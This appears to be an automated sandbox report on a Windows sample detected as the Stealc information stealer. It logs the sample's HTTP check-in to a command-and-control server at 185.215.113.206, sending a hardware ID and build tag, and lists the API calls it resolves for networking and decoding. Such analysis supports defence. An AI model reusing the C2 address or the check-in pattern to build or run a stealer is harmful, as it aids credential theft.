Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.206 | 80 | 1716 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 28, 2024 15:28:00.538064957 CET | 90 | OUT | GET / HTTP/1.1
                                Host: 185.215.113.206
                                Connection: Keep-Alive
                                Cache-Control: no-cache
Oct 28, 2024 15:28:01.428689003 CET | 203 | IN | HTTP/1.1 200 OK
                                Date: Mon, 28 Oct 2024 14:28:01 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 0
                                Keep-Alive: timeout=5, max=100
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
Oct 28, 2024 15:28:01.432284117 CET | 412 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=----BGCAFHCAKFBFIECAFIIJ
                                Host: 185.215.113.206
                                Content-Length: 210
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 46 37 43 42 34 35 46 43 37 43 34 32 35 33 38 31 37 36 37 36 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 46 48 43 41 4b 46 42 46 49 45 43 41 46 49 49 4a 2d 2d 0d 0a
                                Data Ascii: ------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="hwid"5F7CB45FC7C4253817676------BGCAFHCAKFBFIECAFIIJContent-Disposition: form-data; name="build"tale------BGCAFHCAKFBFIECAFIIJ--
Oct 28, 2024 15:28:01.711447954 CET | 210 | IN | HTTP/1.1 200 OK
                                Date: Mon, 28 Oct 2024 14:28:01 GMT
                                Server: Apache/2.4.41 (Ubuntu)
                                Content-Length: 8
                                Keep-Alive: timeout=5, max=99
                                Connection: Keep-Alive
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 59 6d 78 76 59 32 73 3d
                                Data Ascii: YmxvY2s=
Target ID: 0
Start time: 10:27:56
Start date: 28/10/2024
Path: C:\Users\user\Desktop\file.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\file.exe"
Imagebase: 0xe60000
File size: 2'151'424 bytes
MD5 hash: 15716110BA606BED84E305D1D8525EBA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2073513483.0000000005530000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2114601767.000000000171E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true


                                  Execution Graph

Execution Coverage: 3%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 3.5%
Total number of Nodes: 1327
Total number of Limit Nodes: 24
API calls 38740->38741 38742 e63dc5 38741->38742 38743 e64610 2 API calls 38742->38743 38744 e63dde 38743->38744 38745 e64610 2 API calls 38744->38745 38746 e63df7 38745->38746 38747 e64610 2 API calls 38746->38747 38748 e63e10 38747->38748 38749 e64610 2 API calls 38748->38749 38750 e63e29 38749->38750 38751 e64610 2 API calls 38750->38751 38752 e63e42 38751->38752 38753 e64610 2 API calls 38752->38753 38754 e63e5b 38753->38754 38755 e64610 2 API calls 38754->38755 38756 e63e74 38755->38756 38757 e64610 2 API calls 38756->38757 38758 e63e8d 38757->38758 38759 e64610 2 API calls 38758->38759 38760 e63ea6 38759->38760 38761 e64610 2 API calls 38760->38761 38762 e63ebf 38761->38762 38763 e64610 2 API calls 38762->38763 38764 e63ed8 38763->38764 38765 e64610 2 API calls 38764->38765 38766 e63ef1 38765->38766 38767 e64610 2 API calls 38766->38767 38768 e63f0a 38767->38768 38769 e64610 2 API calls 38768->38769 38770 e63f23 38769->38770 38771 e64610 2 API calls 38770->38771 38772 e63f3c 38771->38772 38773 e64610 2 API calls 38772->38773 38774 e63f55 38773->38774 38775 e64610 2 API calls 38774->38775 38776 e63f6e 38775->38776 38777 e64610 2 API calls 38776->38777 38778 e63f87 38777->38778 38779 e64610 2 API calls 38778->38779 38780 e63fa0 38779->38780 38781 e64610 2 API calls 38780->38781 38782 e63fb9 38781->38782 38783 e64610 2 API calls 38782->38783 38784 e63fd2 38783->38784 38785 e64610 2 API calls 38784->38785 38786 e63feb 38785->38786 38787 e64610 2 API calls 38786->38787 38788 e64004 38787->38788 38789 e64610 2 API calls 38788->38789 38790 e6401d 38789->38790 38791 e64610 2 API calls 38790->38791 38792 e64036 38791->38792 38793 e64610 2 API calls 38792->38793 38794 e6404f 38793->38794 38795 e64610 2 API calls 38794->38795 38796 e64068 38795->38796 38797 e64610 2 API calls 38796->38797 38798 e64081 38797->38798 38799 e64610 2 API calls 38798->38799 38800 e6409a 38799->38800 38801 e64610 2 API calls 38800->38801 38802 e640b3 38801->38802 38803 e64610 2 API calls 
38802->38803 38804 e640cc 38803->38804 38805 e64610 2 API calls 38804->38805 38806 e640e5 38805->38806 38807 e64610 2 API calls 38806->38807 38808 e640fe 38807->38808 38809 e64610 2 API calls 38808->38809 38810 e64117 38809->38810 38811 e64610 2 API calls 38810->38811 38812 e64130 38811->38812 38813 e64610 2 API calls 38812->38813 38814 e64149 38813->38814 38815 e64610 2 API calls 38814->38815 38816 e64162 38815->38816 38817 e64610 2 API calls 38816->38817 38818 e6417b 38817->38818 38819 e64610 2 API calls 38818->38819 38820 e64194 38819->38820 38821 e64610 2 API calls 38820->38821 38822 e641ad 38821->38822 38823 e64610 2 API calls 38822->38823 38824 e641c6 38823->38824 38825 e64610 2 API calls 38824->38825 38826 e641df 38825->38826 38827 e64610 2 API calls 38826->38827 38828 e641f8 38827->38828 38829 e64610 2 API calls 38828->38829 38830 e64211 38829->38830 38831 e64610 2 API calls 38830->38831 38832 e6422a 38831->38832 38833 e64610 2 API calls 38832->38833 38834 e64243 38833->38834 38835 e64610 2 API calls 38834->38835 38836 e6425c 38835->38836 38837 e64610 2 API calls 38836->38837 38838 e64275 38837->38838 38839 e64610 2 API calls 38838->38839 38840 e6428e 38839->38840 38841 e64610 2 API calls 38840->38841 38842 e642a7 38841->38842 38843 e64610 2 API calls 38842->38843 38844 e642c0 38843->38844 38845 e64610 2 API calls 38844->38845 38846 e642d9 38845->38846 38847 e64610 2 API calls 38846->38847 38848 e642f2 38847->38848 38849 e64610 2 API calls 38848->38849 38850 e6430b 38849->38850 38851 e64610 2 API calls 38850->38851 38852 e64324 38851->38852 38853 e64610 2 API calls 38852->38853 38854 e6433d 38853->38854 38855 e64610 2 API calls 38854->38855 38856 e64356 38855->38856 38857 e64610 2 API calls 38856->38857 38858 e6436f 38857->38858 38859 e64610 2 API calls 38858->38859 38860 e64388 38859->38860 38861 e64610 2 API calls 38860->38861 38862 e643a1 38861->38862 38863 e64610 2 API calls 38862->38863 38864 e643ba 38863->38864 38865 e64610 2 API calls 38864->38865 
38866 e643d3 38865->38866 38867 e64610 2 API calls 38866->38867 38868 e643ec 38867->38868 38869 e64610 2 API calls 38868->38869 38870 e64405 38869->38870 38871 e64610 2 API calls 38870->38871 38872 e6441e 38871->38872 38873 e64610 2 API calls 38872->38873 38874 e64437 38873->38874 38875 e64610 2 API calls 38874->38875 38876 e64450 38875->38876 38877 e64610 2 API calls 38876->38877 38878 e64469 38877->38878 38879 e64610 2 API calls 38878->38879 38880 e64482 38879->38880 38881 e64610 2 API calls 38880->38881 38882 e6449b 38881->38882 38883 e64610 2 API calls 38882->38883 38884 e644b4 38883->38884 38885 e64610 2 API calls 38884->38885 38886 e644cd 38885->38886 38887 e64610 2 API calls 38886->38887 38888 e644e6 38887->38888 38889 e64610 2 API calls 38888->38889 38890 e644ff 38889->38890 38891 e64610 2 API calls 38890->38891 38892 e64518 38891->38892 38893 e64610 2 API calls 38892->38893 38894 e64531 38893->38894 38895 e64610 2 API calls 38894->38895 38896 e6454a 38895->38896 38897 e64610 2 API calls 38896->38897 38898 e64563 38897->38898 38899 e64610 2 API calls 38898->38899 38900 e6457c 38899->38900 38901 e64610 2 API calls 38900->38901 38902 e64595 38901->38902 38903 e64610 2 API calls 38902->38903 38904 e645ae 38903->38904 38905 e64610 2 API calls 38904->38905 38906 e645c7 38905->38906 38907 e64610 2 API calls 38906->38907 38908 e645e0 38907->38908 38909 e64610 2 API calls 38908->38909 38910 e645f9 38909->38910 38911 e79f20 38910->38911 38912 e7a346 8 API calls 38911->38912 38913 e79f30 43 API calls 38911->38913 38914 e7a456 38912->38914 38915 e7a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38912->38915 38913->38912 38916 e7a526 38914->38916 38917 e7a463 8 API calls 38914->38917 38915->38914 38918 e7a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38916->38918 38919 e7a5a8 38916->38919 38917->38916 38918->38919 38920 e7a647 38919->38920 38921 e7a5b5 6 API calls 38919->38921 38922 e7a654 9 API calls 
38920->38922 38923 e7a72f 38920->38923 38921->38920 38922->38923 38924 e7a7b2 38923->38924 38925 e7a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38923->38925 38926 e7a7ec 38924->38926 38927 e7a7bb GetProcAddress GetProcAddress 38924->38927 38925->38924 38928 e7a825 38926->38928 38929 e7a7f5 GetProcAddress GetProcAddress 38926->38929 38927->38926 38930 e7a922 38928->38930 38931 e7a832 10 API calls 38928->38931 38929->38928 38932 e7a98d 38930->38932 38933 e7a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38930->38933 38931->38930 38934 e7a996 GetProcAddress 38932->38934 38935 e7a9ae 38932->38935 38933->38932 38934->38935 38936 e7a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 38935->38936 38937 e75ef3 38935->38937 38936->38937 38938 e61590 38937->38938 39208 e616b0 38938->39208 38941 e7aab0 lstrcpy 38942 e615b5 38941->38942 38943 e7aab0 lstrcpy 38942->38943 38944 e615c7 38943->38944 38945 e7aab0 lstrcpy 38944->38945 38946 e615d9 38945->38946 38947 e7aab0 lstrcpy 38946->38947 38948 e61663 38947->38948 38949 e75760 38948->38949 38950 e75771 38949->38950 38951 e7ab30 2 API calls 38950->38951 38952 e7577e 38951->38952 38953 e7ab30 2 API calls 38952->38953 38954 e7578b 38953->38954 38955 e7ab30 2 API calls 38954->38955 38956 e75798 38955->38956 38957 e7aa50 lstrcpy 38956->38957 38958 e757a5 38957->38958 38959 e7aa50 lstrcpy 38958->38959 38960 e757b2 38959->38960 38961 e7aa50 lstrcpy 38960->38961 38962 e757bf 38961->38962 38963 e7aa50 lstrcpy 38962->38963 39003 e757cc 38963->39003 38964 e75440 20 API calls 38964->39003 38965 e75893 StrCmpCA 38965->39003 38966 e758f0 StrCmpCA 38967 e75a2c 38966->38967 38966->39003 38968 e7abb0 lstrcpy 38967->38968 38969 e75a38 38968->38969 38970 e7ab30 2 API calls 38969->38970 38972 e75a46 38970->38972 38971 e7ab30 lstrlen lstrcpy 38971->39003 38974 e7ab30 2 API calls 38972->38974 38973 e75aa6 StrCmpCA 38975 e75be1 38973->38975 38973->39003 38977 e75a55 38974->38977 38976 
e7abb0 lstrcpy 38975->38976 38978 e75bed 38976->38978 38979 e616b0 lstrcpy 38977->38979 38980 e7ab30 2 API calls 38978->38980 39001 e75a61 38979->39001 38982 e75bfb 38980->38982 38981 e7aa50 lstrcpy 38981->39003 38985 e7ab30 2 API calls 38982->38985 38983 e75c5b StrCmpCA 38986 e75c66 Sleep 38983->38986 38987 e75c78 38983->38987 38984 e75510 25 API calls 38984->39003 38989 e75c0a 38985->38989 38986->39003 38990 e7abb0 lstrcpy 38987->38990 38988 e7aab0 lstrcpy 38988->39003 38991 e616b0 lstrcpy 38989->38991 38992 e75c84 38990->38992 38991->39001 38993 e7ab30 2 API calls 38992->38993 38994 e75c93 38993->38994 38995 e7ab30 2 API calls 38994->38995 38997 e75ca2 38995->38997 38996 e759da StrCmpCA 38996->39003 38998 e616b0 lstrcpy 38997->38998 38998->39001 38999 e61590 lstrcpy 38999->39003 39000 e75b8f StrCmpCA 39000->39003 39001->38056 39002 e7abb0 lstrcpy 39002->39003 39003->38964 39003->38965 39003->38966 39003->38971 39003->38973 39003->38981 39003->38983 39003->38984 39003->38988 39003->38996 39003->38999 39003->39000 39003->39002 39005 e776e3 GetVolumeInformationA 39004->39005 39006 e776dc 39004->39006 39007 e77721 39005->39007 39006->39005 39008 e7778c GetProcessHeap RtlAllocateHeap 39007->39008 39009 e777a9 39008->39009 39010 e777b8 wsprintfA 39008->39010 39012 e7aa50 lstrcpy 39009->39012 39011 e7aa50 lstrcpy 39010->39011 39013 e75ff7 39011->39013 39012->39013 39013->38077 39015 e7aab0 lstrcpy 39014->39015 39016 e648e9 39015->39016 39217 e64800 39016->39217 39018 e648f5 39019 e7aa50 lstrcpy 39018->39019 39020 e64927 39019->39020 39021 e7aa50 lstrcpy 39020->39021 39022 e64934 39021->39022 39023 e7aa50 lstrcpy 39022->39023 39024 e64941 39023->39024 39025 e7aa50 lstrcpy 39024->39025 39026 e6494e 39025->39026 39027 e7aa50 lstrcpy 39026->39027 39028 e6495b InternetOpenA StrCmpCA 39027->39028 39029 e64994 39028->39029 39030 e64f1b InternetCloseHandle 39029->39030 39223 e78cf0 39029->39223 39032 e64f38 39030->39032 39238 e6a210 CryptStringToBinaryA 39032->39238 39033 
e649b3 39231 e7ac30 39033->39231 39036 e649c6 39038 e7abb0 lstrcpy 39036->39038 39043 e649cf 39038->39043 39039 e7ab30 2 API calls 39040 e64f55 39039->39040 39042 e7acc0 4 API calls 39040->39042 39041 e64f77 ctype 39045 e7aab0 lstrcpy 39041->39045 39044 e64f6b 39042->39044 39047 e7acc0 4 API calls 39043->39047 39046 e7abb0 lstrcpy 39044->39046 39058 e64fa7 39045->39058 39046->39041 39048 e649f9 39047->39048 39049 e7abb0 lstrcpy 39048->39049 39050 e64a02 39049->39050 39051 e7acc0 4 API calls 39050->39051 39052 e64a21 39051->39052 39053 e7abb0 lstrcpy 39052->39053 39054 e64a2a 39053->39054 39055 e7ac30 3 API calls 39054->39055 39056 e64a48 39055->39056 39057 e7abb0 lstrcpy 39056->39057 39059 e64a51 39057->39059 39058->38080 39060 e7acc0 4 API calls 39059->39060 39061 e64a70 39060->39061 39062 e7abb0 lstrcpy 39061->39062 39063 e64a79 39062->39063 39064 e7acc0 4 API calls 39063->39064 39065 e64a98 39064->39065 39066 e7abb0 lstrcpy 39065->39066 39067 e64aa1 39066->39067 39068 e7acc0 4 API calls 39067->39068 39069 e64acd 39068->39069 39070 e7ac30 3 API calls 39069->39070 39071 e64ad4 39070->39071 39072 e7abb0 lstrcpy 39071->39072 39073 e64add 39072->39073 39074 e64af3 InternetConnectA 39073->39074 39074->39030 39075 e64b23 HttpOpenRequestA 39074->39075 39077 e64f0e InternetCloseHandle 39075->39077 39078 e64b78 39075->39078 39077->39030 39079 e7acc0 4 API calls 39078->39079 39080 e64b8c 39079->39080 39081 e7abb0 lstrcpy 39080->39081 39082 e64b95 39081->39082 39083 e7ac30 3 API calls 39082->39083 39084 e64bb3 39083->39084 39085 e7abb0 lstrcpy 39084->39085 39086 e64bbc 39085->39086 39087 e7acc0 4 API calls 39086->39087 39088 e64bdb 39087->39088 39089 e7abb0 lstrcpy 39088->39089 39090 e64be4 39089->39090 39091 e7acc0 4 API calls 39090->39091 39092 e64c05 39091->39092 39093 e7abb0 lstrcpy 39092->39093 39094 e64c0e 39093->39094 39095 e7acc0 4 API calls 39094->39095 39096 e64c2e 39095->39096 39097 e7abb0 lstrcpy 39096->39097 39098 e64c37 39097->39098 39099 e7acc0 4 API calls 
39098->39099 39100 e64c56 39099->39100 39101 e7abb0 lstrcpy 39100->39101 39102 e64c5f 39101->39102 39103 e7ac30 3 API calls 39102->39103 39104 e64c7d 39103->39104 39105 e7abb0 lstrcpy 39104->39105 39106 e64c86 39105->39106 39107 e7acc0 4 API calls 39106->39107 39108 e64ca5 39107->39108 39109 e7abb0 lstrcpy 39108->39109 39110 e64cae 39109->39110 39111 e7acc0 4 API calls 39110->39111 39112 e64ccd 39111->39112 39113 e7abb0 lstrcpy 39112->39113 39114 e64cd6 39113->39114 39115 e7ac30 3 API calls 39114->39115 39116 e64cf4 39115->39116 39117 e7abb0 lstrcpy 39116->39117 39118 e64cfd 39117->39118 39119 e7acc0 4 API calls 39118->39119 39120 e64d1c 39119->39120 39121 e7abb0 lstrcpy 39120->39121 39122 e64d25 39121->39122 39123 e7acc0 4 API calls 39122->39123 39124 e64d46 39123->39124 39125 e7abb0 lstrcpy 39124->39125 39126 e64d4f 39125->39126 39127 e7acc0 4 API calls 39126->39127 39128 e64d6f 39127->39128 39129 e7abb0 lstrcpy 39128->39129 39130 e64d78 39129->39130 39131 e7acc0 4 API calls 39130->39131 39132 e64d97 39131->39132 39133 e7abb0 lstrcpy 39132->39133 39134 e64da0 39133->39134 39135 e7ac30 3 API calls 39134->39135 39136 e64dbe 39135->39136 39137 e7abb0 lstrcpy 39136->39137 39138 e64dc7 39137->39138 39139 e7aa50 lstrcpy 39138->39139 39140 e64de2 39139->39140 39141 e7ac30 3 API calls 39140->39141 39142 e64e03 39141->39142 39143 e7ac30 3 API calls 39142->39143 39144 e64e0a 39143->39144 39145 e7abb0 lstrcpy 39144->39145 39146 e64e16 39145->39146 39147 e64e37 lstrlen 39146->39147 39148 e64e4a 39147->39148 39149 e64e53 lstrlen 39148->39149 39237 e7ade0 39149->39237 39151 e64e63 HttpSendRequestA 39152 e64e82 InternetReadFile 39151->39152 39153 e64eb7 InternetCloseHandle 39152->39153 39158 e64eae 39152->39158 39155 e7ab10 39153->39155 39155->39077 39156 e7acc0 4 API calls 39156->39158 39157 e7abb0 lstrcpy 39157->39158 39158->39152 39158->39153 39158->39156 39158->39157 39244 e7ade0 39159->39244 39161 e71a14 StrCmpCA 39162 e71a1f ExitProcess 39161->39162 39174 e71a27 
39161->39174 39163 e71c12 39163->38082 39164 e71b63 StrCmpCA 39164->39174 39165 e71b82 StrCmpCA 39165->39174 39166 e71b41 StrCmpCA 39166->39174 39167 e71ba1 StrCmpCA 39167->39174 39168 e71bc0 StrCmpCA 39168->39174 39169 e71acf StrCmpCA 39169->39174 39170 e71aad StrCmpCA 39170->39174 39171 e71b1f StrCmpCA 39171->39174 39172 e71afd StrCmpCA 39172->39174 39173 e7ab30 lstrlen lstrcpy 39173->39174 39174->39163 39174->39164 39174->39165 39174->39166 39174->39167 39174->39168 39174->39169 39174->39170 39174->39171 39174->39172 39174->39173 39175->38088 39176->38090 39177->38096 39178->38098 39179->38104 39180->38106 39181->38110 39182->38114 39183->38118 39184->38124 39185->38126 39186->38130 39187->38144 39188->38147 39189->38148 39190->38143 39191->38148 39192->38163 39193->38151 39194->38154 39195->38157 39196->38160 39197->38165 39198->38167 39199->38174 39200->38180 39201->38201 39202->38204 39203->38211 39204->38200 39205->38211 39206->38214 39209 e7aab0 lstrcpy 39208->39209 39210 e616c3 39209->39210 39211 e7aab0 lstrcpy 39210->39211 39212 e616d5 39211->39212 39213 e7aab0 lstrcpy 39212->39213 39214 e616e7 39213->39214 39215 e7aab0 lstrcpy 39214->39215 39216 e615a3 39215->39216 39216->38941 39218 e64816 39217->39218 39219 e64888 lstrlen 39218->39219 39243 e7ade0 39219->39243 39221 e64898 InternetCrackUrlA 39222 e648b7 39221->39222 39222->39018 39224 e7aa50 lstrcpy 39223->39224 39225 e78d04 39224->39225 39226 e7aa50 lstrcpy 39225->39226 39227 e78d12 GetSystemTime 39226->39227 39229 e78d29 39227->39229 39228 e7aab0 lstrcpy 39230 e78d8c 39228->39230 39229->39228 39230->39033 39233 e7ac41 39231->39233 39232 e7ac98 39234 e7aab0 lstrcpy 39232->39234 39233->39232 39235 e7ac78 lstrcpy lstrcat 39233->39235 39236 e7aca4 39234->39236 39235->39232 39236->39036 39237->39151 39239 e64f3e 39238->39239 39240 e6a249 LocalAlloc 39238->39240 39239->39039 39239->39041 39240->39239 39241 e6a264 CryptStringToBinaryA 39240->39241 39241->39239 39242 e6a289 LocalFree 39241->39242 
39242->39239 39243->39221 39244->39161

                                  Control-flow Graph

                                  control_flow_graph 660 e79bb0-e79bc4 call e79aa0 663 e79de3-e79e42 LoadLibraryA * 5 660->663 664 e79bca-e79dde call e79ad0 GetProcAddress * 21 660->664 666 e79e44-e79e58 GetProcAddress 663->666 667 e79e5d-e79e64 663->667 664->663 666->667 669 e79e96-e79e9d 667->669 670 e79e66-e79e91 GetProcAddress * 2 667->670 671 e79e9f-e79eb3 GetProcAddress 669->671 672 e79eb8-e79ebf 669->672 670->669 671->672 673 e79ec1-e79ed4 GetProcAddress 672->673 674 e79ed9-e79ee0 672->674 673->674 675 e79ee2-e79f0c GetProcAddress * 2 674->675 676 e79f11-e79f12 674->676 675->676
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,017306D8), ref: 00E79BF1
                                  • GetProcAddress.KERNEL32(75900000,01730798), ref: 00E79C0A
                                  • GetProcAddress.KERNEL32(75900000,017306A8), ref: 00E79C22
                                  • GetProcAddress.KERNEL32(75900000,01730708), ref: 00E79C3A
                                  • GetProcAddress.KERNEL32(75900000,01730558), ref: 00E79C53
                                  • GetProcAddress.KERNEL32(75900000,01738958), ref: 00E79C6B
                                  • GetProcAddress.KERNEL32(75900000,017258E8), ref: 00E79C83
                                  • GetProcAddress.KERNEL32(75900000,01725AE8), ref: 00E79C9C
                                  • GetProcAddress.KERNEL32(75900000,01730678), ref: 00E79CB4
                                  • GetProcAddress.KERNEL32(75900000,01730720), ref: 00E79CCC
                                  • GetProcAddress.KERNEL32(75900000,01730738), ref: 00E79CE5
                                  • GetProcAddress.KERNEL32(75900000,017307B0), ref: 00E79CFD
                                  • GetProcAddress.KERNEL32(75900000,01725B48), ref: 00E79D15
                                  • GetProcAddress.KERNEL32(75900000,017307E0), ref: 00E79D2E
                                  • GetProcAddress.KERNEL32(75900000,01730570), ref: 00E79D46
                                  • GetProcAddress.KERNEL32(75900000,01725B88), ref: 00E79D5E
                                  • GetProcAddress.KERNEL32(75900000,01730750), ref: 00E79D77
                                  • GetProcAddress.KERNEL32(75900000,01730900), ref: 00E79D8F
                                  • GetProcAddress.KERNEL32(75900000,01725A08), ref: 00E79DA7
                                  • GetProcAddress.KERNEL32(75900000,01730858), ref: 00E79DC0
                                  • GetProcAddress.KERNEL32(75900000,01725A28), ref: 00E79DD8
                                  • LoadLibraryA.KERNEL32(01730840,?,00E76CA0), ref: 00E79DEA
                                  • LoadLibraryA.KERNEL32(01730870,?,00E76CA0), ref: 00E79DFB
                                  • LoadLibraryA.KERNEL32(017308E8,?,00E76CA0), ref: 00E79E0D
                                  • LoadLibraryA.KERNEL32(017308D0,?,00E76CA0), ref: 00E79E1F
                                  • LoadLibraryA.KERNEL32(01730888,?,00E76CA0), ref: 00E79E30
                                  • GetProcAddress.KERNEL32(75070000,017308A0), ref: 00E79E52
                                  • GetProcAddress.KERNEL32(75FD0000,017308B8), ref: 00E79E73
                                  • GetProcAddress.KERNEL32(75FD0000,01738BE0), ref: 00E79E8B
                                  • GetProcAddress.KERNEL32(75A50000,01738DA8), ref: 00E79EAD
                                  • GetProcAddress.KERNEL32(74E50000,01725928), ref: 00E79ECE
                                  • GetProcAddress.KERNEL32(76E80000,01738968), ref: 00E79EEF
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00E79F06
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00E79EFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 2be697ba5fa1e563c938525d9f2d622301daedb301332d11ff2350f6b23133b2
                                  • Instruction ID: 624fe3f2df4e2178bc4ab3e1b9849b2fc76d92e26c7edc2c21ab4e8efc436bce
                                  • Opcode Fuzzy Hash: 2be697ba5fa1e563c938525d9f2d622301daedb301332d11ff2350f6b23133b2
                                  • Instruction Fuzzy Hash: 23A1FFF6514200AFC36CDFA9E8989667BFAA74D7017108A3AF929C369CD73495C0DF60

                                  Control-flow Graph

                                  control_flow_graph 764 e64610-e646e5 RtlAllocateHeap 781 e646f0-e646f6 764->781 782 e6479f-e647f9 VirtualProtect 781->782 783 e646fc-e6479a 781->783 783->781
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E6465E
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E647EC
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (same string referenced 30 times), xrefs: 00E647B5, 00E647CB, 00E646BD, 00E6478F, 00E64779, 00E646D3, 00E64667, 00E646C8, 00E6476E, 00E64638, 00E64688, 00E64707, 00E646B2, 00E64784, 00E64693, 00E64728, 00E6471D, 00E647AA, 00E64672, 00E646A7, 00E6479F, 00E647C0, 00E64622, 00E6467D, 00E64712, 00E64763, 00E64617, 00E64643, 00E646FC, 00E6462D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2113924425.0000000000E61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true
                                  • Associated: 00000000.00000002.2113912243.0000000000E60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000E8C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FA9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000000FCE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2113924425.0000000001136000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.000000000114A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000012D0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013B3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013D9000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013E0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114111688.00000000013EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114342226.00000000013F0000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114468159.0000000001592000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2114503713.0000000001593000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
